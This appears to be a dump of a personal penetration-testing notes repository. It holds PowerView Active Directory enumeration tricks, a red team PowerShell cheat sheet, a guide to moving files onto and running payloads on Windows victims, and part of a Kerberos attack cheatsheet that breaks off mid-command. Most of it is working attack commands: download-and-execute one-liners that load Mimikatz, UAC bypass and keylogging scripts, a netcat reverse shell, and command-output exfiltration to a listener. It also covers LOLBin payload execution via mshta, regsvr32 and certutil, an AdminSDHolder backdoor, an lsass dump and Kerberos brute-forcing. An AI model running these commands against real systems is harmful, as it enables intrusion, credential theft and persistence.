├── PowerView-3.0-tricks.ps1 ├── README.md ├── RedTeam_CheatSheet.ps1 ├── filetransfers.md ├── kerberos.md ├── linux-privesc.md ├── pivoting.md ├── web.md └── windows-privesc.md /PowerView-3.0-tricks.ps1: -------------------------------------------------------------------------------- 1 | # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ 2 | # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c 3 | 4 | # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: 5 | # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 6 | 7 | # New function naming schema: 8 | # Verbs: 9 | # Get : retrieve full raw data sets 10 | # Find : ‘find’ specific data entries in a data set 11 | # Add : add a new object to a destination 12 | # Set : modify a given object 13 | # Invoke : lazy catch-all 14 | # Nouns: 15 | # Verb-Domain* : indicates that LDAP/.NET querying methods are being executed 16 | # Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration 17 | # Verb-Net* : indicates that Win32 API access is being used under the hood 18 | 19 | 20 | # get all the groups a user is effectively a member of, 'recursing up' using tokenGroups 21 | Get-DomainGroup -MemberIdentity 22 | 23 | # get all the effective members of a group, 'recursing down' 24 | Get-DomainGroupMember -Identity "Domain Admins" -Recurse 25 | 26 | # use an alterate creadential for any function 27 | $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force 28 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 29 | Get-DomainUser -Credential $Cred 30 | 31 | # retrieve all the computer dns host names a GPP password applies to 32 | Get-DomainOU -GPLink '' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname} 33 | 34 | # get all users with passwords changed > 1 year ago, returning sam account names and password last set times 35 | $Date = (Get-Date).AddYears(-1).ToFileTime() 36 | Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset 37 | 38 | # all enabled users, returning distinguishednames 39 | Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname 40 | Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname 41 | 42 | # all disabled users 43 | Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)" 44 | Get-DomainUser -UACFilter ACCOUNTDISABLE 45 | 46 | # all users that require smart card authentication 47 | Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)" 48 | Get-DomainUser -UACFilter SMARTCARD_REQUIRED 49 | 50 | # all users that *don't* require smart card authentication, only returning sam account names 51 | Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname 52 | Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname 53 | 54 | # use multiple identity types for any *-Domain* function 55 | 'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff 56 | 57 | # find all users with an SPN set (likely service accounts) 58 | Get-DomainUser -SPN 59 | 60 | # check for users who don't have kerberos preauthentication set 61 | Get-DomainUser -PreauthNotRequired 62 | Get-DomainUser -UACFilter DONT_REQ_PREAUTH 63 | 64 | # find all service accounts in "Domain Admins" 65 | Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'} 66 | 67 | # find users with sidHistory set 68 | Get-DomainUser -LDAPFilter '(sidHistory=*)' 69 | 70 | # find any users/computers with constrained delegation st 71 | Get-DomainUser -TrustedToAuth 72 | Get-DomainComputer -TrustedToAuth 73 | 74 | # enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation 75 | $Computers = Get-DomainComputer -Unconstrained 76 | $Users = Get-DomainUser -AllowDelegation -AdminCount 77 | 78 | # return the local *groups* of a remote server 79 | Get-NetLocalGroup SERVER.domain.local 80 | 81 | # return the local group *members* of a remote server using Win32 API methods (faster but less info) 82 | Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local 83 | 84 | # Kerberoast any users in a particular OU with SPNs set 85 | Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" 86 | 87 | # Find-DomainUserLocation == old Invoke-UserHunter 88 | # enumerate servers that allow unconstrained Kerberos delegation and show all users logged in 89 | Find-DomainUserLocation -ComputerUnconstrained -ShowAll 90 | 91 | # hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation 92 | Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation 93 | 94 | # find all computers in a given OU 95 | Get-DomainComputer -SearchBase "ldap://OU=..." 96 | 97 | # Get the logged on users for all machines in any *server* OU in a particular domain 98 | Get-DomainOU -Identity *server* -Domain | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}} 99 | 100 | # enumerate all gobal catalogs in the forest 101 | Get-ForestGlobalCatalog 102 | 103 | # turn a list of computer short names to FQDNs, using a global catalog 104 | gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname} 105 | 106 | # enumerate the current domain controller policy 107 | $DCPolicy = Get-DomainPolicy -Policy DC 108 | $DCPolicy.PrivilegeRights # user privilege rights on the dc... 109 | 110 | # enumerate the current domain policy 111 | $DomainPolicy = Get-DomainPolicy -Policy Domain 112 | $DomainPolicy.KerberosPolicy # useful for golden tickets ;) 113 | $DomainPolicy.SystemAccess # password age/etc. 114 | 115 | # enumerate what machines that a particular user/group identity has local admin rights to 116 | # Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation 117 | Get-DomainGPOUserLocalGroupMapping -Identity 118 | 119 | # enumerate what machines that a given user in the specified domain has RDP access rights to 120 | Get-DomainGPOUserLocalGroupMapping -Identity -Domain -LocalGroup RDP 121 | 122 | # export a csv of all GPO mappings 123 | Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv 124 | 125 | # use alternate credentials for searching for files on the domain 126 | # Find-InterestingDomainShareFile == old Invoke-FileFinder 127 | $Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force 128 | $Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password) 129 | Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential 130 | 131 | # enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names 132 | Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local 133 | 134 | # grant user 'will' the rights to change 'matt's password 135 | Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose 136 | 137 | # audit the permissions of AdminSDHolder, resolving GUIDs 138 | Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs 139 | 140 | # backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse 141 | Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All 142 | 143 | # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) 144 | Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { 145 | ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') 146 | } 147 | 148 | # find linked DA accounts using name correlation 149 | Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname} 150 | 151 | # save a PowerView object to disk for later usage 152 | Get-DomainUser | Export-Clixml user.xml 153 | $Users = Import-Clixml user.xml 154 | 155 | # Find any machine accounts in privileged groups 156 | Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} 157 | 158 | # Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights 159 | Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} 160 | 161 | # find all policies applied to a current machine 162 | Get-DomainGPO -ComputerIdentity windows1.testlab.local 163 | 164 | # enumerate all groups in a domain that don't have a global scope, returning just group names 165 | Get-DomainGroup -GroupScope NotGlobal -Properties name 166 | 167 | # enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships 168 | # query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames 169 | $ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname 170 | $Domains = @{} 171 | $ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) { 172 | # extract the domain the foreign user was added to 173 | $ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' 174 | # check if we've already enumerated this domain 175 | if (-not $Domains[$ForeignUserDomain]) { 176 | $Domains[$ForeignUserDomain] = $True 177 | # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set 178 | $Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))" 179 | Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member 180 | } 181 | } 182 | $ForeignMemberships | fl 183 | 184 | # if running in -sta mode, impersonate another credential a la "runas /netonly" 185 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 186 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 187 | Invoke-UserImpersonation -Credential $Cred 188 | # ... action 189 | Invoke-RevertToSelf 190 | 191 | # enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer 192 | Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier 193 | 194 | # set the specified property for the given user identity 195 | Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose 196 | 197 | # Set the owner of 'dfm' in the current domain to 'harmj0y' 198 | Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y 199 | 200 | # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) 201 | Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? { 202 | ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get') 203 | } 204 | 205 | # check if any user passwords are set 206 | $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl 207 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # pentest-notes 2 | 3 | Just my notes of things I have come across and don't want to google and forget anymore. Some checklists for privilege escalation and enumeration. 4 | -------------------------------------------------------------------------------- /RedTeam_CheatSheet.ps1: -------------------------------------------------------------------------------- 1 | ## Forked from here https://gist.github.com/m8r0wn/b6654989035af20a1cb777b61fbc29bf 2 | 3 | # Domain Recon 4 | ## ShareFinder - Look for shares on network and check access under current user context & Log to file 5 | powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" 6 | 7 | ## Import PowerView Module 8 | powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')" 9 | 10 | ## Invoke-BloodHound for domain recon 11 | powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" 12 | 13 | ## ADRecon script to generate XLSX file of domain properties 14 | powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/sense-of-security/ADRecon/master/ADRecon.ps1')" 15 | 16 | 17 | # Priv Esc 18 | ## PowerUp script 19 | powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks” 20 | 21 | ## cPasswords in sysvol 22 | findstr /S cpassword %logonserver%\sysvol\*.xml 23 | findstr /S cpassword $env:logonserver\sysvol\*.xml 24 | 25 | ## Inveigh 26 | ### Start inveigh using Basic Auth - logging to file 27 | powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y -HTTPAuth Basic" 28 | 29 | ### Start inveigh in silent mode (no popups) 30 | powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y -WPADAuth anonymous" 31 | 32 | ## Invoke-HotPotato Exploit 33 | powershell.exe -nop -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Tater/master/Tater.ps1');invoke-Tater -Command 'net localgroup Administrators user /add'" 34 | 35 | ## Bypass UAC and launch PowerShell window as admin 36 | powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" 37 | 38 | ## Invoke-Kerberoast with Hashcat Output 39 | powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat" 40 | 41 | 42 | # Reg Keys 43 | ## Enable Wdigest 44 | reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1 /f 45 | 46 | ## Check always install elevated 47 | reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer 48 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer 49 | 50 | 51 | # Mimikatz 52 | ## Invoke Mimikatz 53 | powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" 54 | 55 | ## Import Mimikatz Module 56 | powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" 57 | 58 | ## Perform DcSync attack 59 | Invoke-Mimikatz -Command '"lsadump::dcsync /domain:demodomain /user:sqladmin"' 60 | 61 | ## Invoke-MassMimikatz 62 | powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose" 63 | 64 | ## Manual Procdump for offline mimikatz 65 | .\procdump.exe -accepteula -ma lsass.exe lsass.dmp 66 | 67 | 68 | # Useful Scripts/Commands 69 | ## Use Windows Debug api to pause live processes 70 | powershell.exe -nop -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/Pause-Process/master/pause-process.ps1');Pause-Process -ID 1180;UnPause-Process -ID 1180;" 71 | 72 | ## Import Powersploits invoke-keystrokes 73 | powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')" 74 | 75 | ## Import Empire's Get-ClipboardContents 76 | powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1')" 77 | 78 | ## Import Get-TimedScreenshot 79 | powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/obscuresec/PowerShell/master/Get-TimedScreenshot')" 80 | 81 | ## Return executed command output from 53/udp 82 | ### On your host: 83 | $ nc -lnvup 53 84 | ### Replace with ip of the listening machine 85 | powershell.exe -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));" 86 | ### TCP version 87 | powershell -c "whoami | % {$w=(New-Object System.IO.StreamWriter((New-Object System.Net.Sockets.TCPClient([System.Net.IPAddress]::Parse(\"\"),80)).GetStream()));$w.WriteLine($_);$w.Flush()}" 88 | 89 | 90 | # Useful Links 91 | ## Nmap 92 | https://nmap.org/dist/nmap-7.70-win32.zip 93 | 94 | ## 32 and 64 bit Windows Netcat Binary 95 | https://eternallybored.org/misc/netcat/ 96 | 97 | ## EyeWitness Binary 98 | https://www.christophertruncer.com/InstallMe/EyeWitness.zip 99 | 100 | ## Sys InternalTools 101 | https://live.sysinternals.com/ 102 | https://download.sysinternals.com/files/SysinternalsSuite.zip 103 | 104 | ## List of Binaries that can be used for living off the land techniques 105 | https://github.com/api0cradle/LOLBAS 106 | -------------------------------------------------------------------------------- /filetransfers.md: -------------------------------------------------------------------------------- 1 | ## File Transfers 2 | Some methods to transfer files from linux to windows. Thanks to this post 3 | 4 | https://blog.ropnop.com/transferring-files-from-kali-to-windows/ 5 | 6 | ### Impacket smbserver 7 | 8 | https://github.com/CoreSecurity/impacket 9 | 10 | Run smbserver on kali with a share name and the folder you want 11 | 12 | ```smbserver.py BLAH /root/shells``` 13 | 14 | Then from windows victim we can easily copy files 15 | ``` 16 | net view \\10.10.10.10 17 | dir \\10.10.10.10\BLAH 18 | copy \\10.10.10.10\BLAH\met443.exe . 19 | ``` 20 | 21 | You can also just execute things remotely: 22 | 23 | ```\\10.10.10.10\BLAH\met443.exe``` 24 | 25 | Or we can map a network drive/share and run something remotely like this: 26 | 27 | ```powershell 28 | net use s: \\\\192.168.49.128\\a 29 | s:\\nc.exe -e cmd.exe 192.168.49.128 139 30 | ``` 31 | 32 | 33 | ### Powershell 34 | The long way is to create a .ps1 file to connect to our webserver and download something... 35 | ``` 36 | echo $storageDir = $pwd > wget.ps1 37 | echo $webclient = New-Object System.Net.WebClient >>wget.ps1 38 | echo $url = "http://10.10.14.22:8000/wget.exe" >>wget.ps1 39 | echo $file = "wget.exe" >>wget.ps1 40 | echo $webclient.DownloadFile($url,$file) >>wget.ps1 41 | ``` 42 | Then to run it from our regular windows shell: 43 | ``` 44 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 45 | ``` 46 | We can run a one line like this also in a normal windows shell to quickly download something... 47 | ``` 48 | powershell "IEX(New-Object Net.WebClient).DownloadFile('http://10.10.14.22/met443.exe','C:\Users\740i\Desktop\met443.exe')" 49 | ``` 50 | or 51 | ``` 52 | Invoke-WebRequest "https://10.10.14.22:8000/met443.exe" -OutFile "C:\Windows\Temp\blah.exe" 53 | ``` 54 | 55 | More examples from an HTTP server 56 | 57 | ```powershell 58 | powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex" 59 | 60 | # Download only 61 | (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/PowerUp.ps1", "C:\Windows\Temp\PowerUp.ps1") 62 | Invoke-WebRequest "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe" 63 | 64 | # Download and run Rubeus, with arguments 65 | $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/Rubeus.exe') 66 | $assem = [System.Reflection.Assembly]::Load($data) 67 | [Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split()) 68 | 69 | # Execute a specific method from an assembly 70 | $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/lib.dll') 71 | $assem = [System.Reflection.Assembly]::Load($data) 72 | $class = $assem.GetType("ClassLibrary1.Class1") 73 | $method = $class.GetMethod("runner") 74 | $method.Invoke(0, $null) 75 | ``` 76 | 77 | From a Webdav server 78 | 79 | ```powershell 80 | powershell -exec bypass -f \\webdavserver\folder\payload.ps1 81 | ``` 82 | 83 | 84 | 85 | ### VBS 86 | You may have to pipe whatever file through unix2dos before copying to a windows machine. Sometimes its easier to just copy the wget binary from /usr/share/windows-binaries. 87 | ``` 88 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 89 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 90 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 91 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 92 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 93 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 94 | echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 95 | echo Err.Clear >> wget.vbs 96 | echo Set http = Nothing >> wget.vbs 97 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 98 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 99 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 100 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 101 | echo http.Open "GET", strURL, False >> wget.vbs 102 | echo http.Send >> wget.vbs 103 | echo Set http = Nothing >> wget.vbs 104 | echo varByteArray = http.ResponseBody >> wget.vbs 105 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 106 | echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 107 | echo strBuffer = "" >> wget.vbs 108 | echo strData = "" >> wget.vbs 109 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 110 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 111 | cho Next >> wget.vbs 112 | echo ts.Close >> wget.vbs 113 | ``` 114 | Then to run it 115 | ``` 116 | cscript wget.vbs http:/// 117 | ``` 118 | 119 | ### FTP 120 | 121 | For FTP make sure you install it first 122 | ``` 123 | apt-get install python-pyftpdlib 124 | python -m pyftpdlib -p 21 125 | ``` 126 | You then can use a text file containing something like this to download a file... 127 | ``` 128 | open 10.10.14.22 129 | anonymous 130 | whatever 131 | binary 132 | get met443.exe 133 | bye 134 | ``` 135 | Then do ```ftp -s:ftp_commands.txt ``` and it downloads with no interaction. 136 | 137 | To echo it as a one liner do this... 138 | ``` 139 | echo open 10.10.14.22>ftp_commands.txt&echo anonymous>>ftp_commands.txt&echo password>>ftp_commands.txt&echo binary>>ftp_commands.txt&echo get met8888.exe>>ftp_commands.txt&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt 140 | ``` 141 | 142 | 143 | ### TFTP 144 | 145 | You can use the metasploit ```auxiliary/server/tftp``` server. Or run atftpd: 146 | ``` 147 | mkdir /tftp 148 | atftpd --daemon --port 69 /tftp 149 | ``` 150 | Then from windows... 151 | ``` 152 | tftp -i 10.10.14.22 get met443.exe 153 | ``` 154 | 155 | ### Debug.exe 156 | https://github.com/g0tmi1k/exe2hex 157 | 158 | Need to test but this only works on 32 bit machines? 159 | 160 | 161 | 162 | 163 | ## Download and Execute 164 | The rest are quick methods on windows to execute a payload. Taken from https://github.com/swisskyrepo/PayloadsAllTheThings 165 | 166 | ### Downloaded files location 167 | 168 | - C:\Users\\AppData\Local\Microsoft\Windows\Temporary Internet Files\ 169 | - C:\Users\\AppData\Local\Microsoft\Windows\INetCache\IE\ 170 | - C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV 171 | 172 | 173 | ### Cmd 174 | 175 | ```powershell 176 | cmd.exe /k < \\webdavserver\folder\batchfile.txt 177 | ``` 178 | 179 | ### Cscript / Wscript 180 | 181 | ```powershell 182 | cscript //E:jscript \\webdavserver\folder\payload.txt 183 | ``` 184 | 185 | ### Mshta 186 | 187 | ```powershell 188 | mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) 189 | ``` 190 | 191 | ```powershell 192 | mshta http://webserver/payload.hta 193 | ``` 194 | 195 | ```powershell 196 | mshta \\webdavserver\folder\payload.hta 197 | ``` 198 | 199 | ### Rundll32 200 | 201 | ```powershell 202 | rundll32 \\webdavserver\folder\payload.dll,entrypoint 203 | ``` 204 | 205 | ```powershell 206 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); 207 | ``` 208 | 209 | ### Regasm / Regsvc @subTee 210 | 211 | ```powershell 212 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll 213 | ``` 214 | 215 | ### Regsvr32 @subTee 216 | 217 | ```powershell 218 | regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll 219 | ``` 220 | 221 | ```powershell 222 | regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll 223 | ``` 224 | 225 | ### Odbcconf 226 | 227 | ```powershell 228 | odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} 229 | ``` 230 | 231 | ### Msbuild 232 | 233 | ```powershell 234 | cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" 235 | ``` 236 | 237 | ## Certutil 238 | 239 | ``` 240 | certutil.exe -urlcache -split -f https://myserver/filename outputfilename 241 | ``` 242 | 243 | ```powershell 244 | certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll 245 | ``` 246 | 247 | ```powershell 248 | certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe 249 | ``` 250 | 251 | ### Bitsadmin 252 | 253 | ```powershell 254 | bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe 255 | ``` 256 | 257 | 258 | ### References 259 | 260 | - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) 261 | - https://github.com/milkdevil/UltimateAppLockerByPassList 262 | -------------------------------------------------------------------------------- /kerberos.md: -------------------------------------------------------------------------------- 1 | # Kerberos cheatsheet 2 | 3 | This is forked from this gist thanks to TarLogic for the hard work https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a 4 | 5 | ## Bruteforcing 6 | 7 | With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute): 8 | ```shell 9 | python kerbrute.py -domain -users -passwords -outputfile 10 | ``` 11 | 12 | With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module: 13 | ```shell 14 | # with a list of users 15 | .\Rubeus.exe brute /users: /passwords: /domain: /outfile: 16 | 17 | # check passwords for all users in current domain 18 | .\Rubeus.exe brute /passwords: /outfile: 19 | ``` 20 | 21 | ## ASREPRoast 22 | 23 | With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetNPUsers.py: 24 | ```shell 25 | # check ASREPRoast for all domain users (credentials required) 26 | python GetNPUsers.py /: -request -format -outputfile 27 | 28 | # check ASREPRoast for a list of users (no credentials required) 29 | python GetNPUsers.py / -usersfile -format -outputfile 30 | ``` 31 | 32 | With [Rubeus](https://github.com/GhostPack/Rubeus): 33 | ```shell 34 | # check ASREPRoast for all users in current domain 35 | .\Rubeus.exe asreproast /format: /outfile: 36 | ``` 37 | 38 | Cracking with dictionary of passwords: 39 | ```shell 40 | hashcat -m 18200 -a 0 41 | 42 | john --wordlist= 43 | ``` 44 | 45 | 46 | ## Kerberoasting 47 | 48 | With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetUserSPNs.py: 49 | ```shell 50 | python 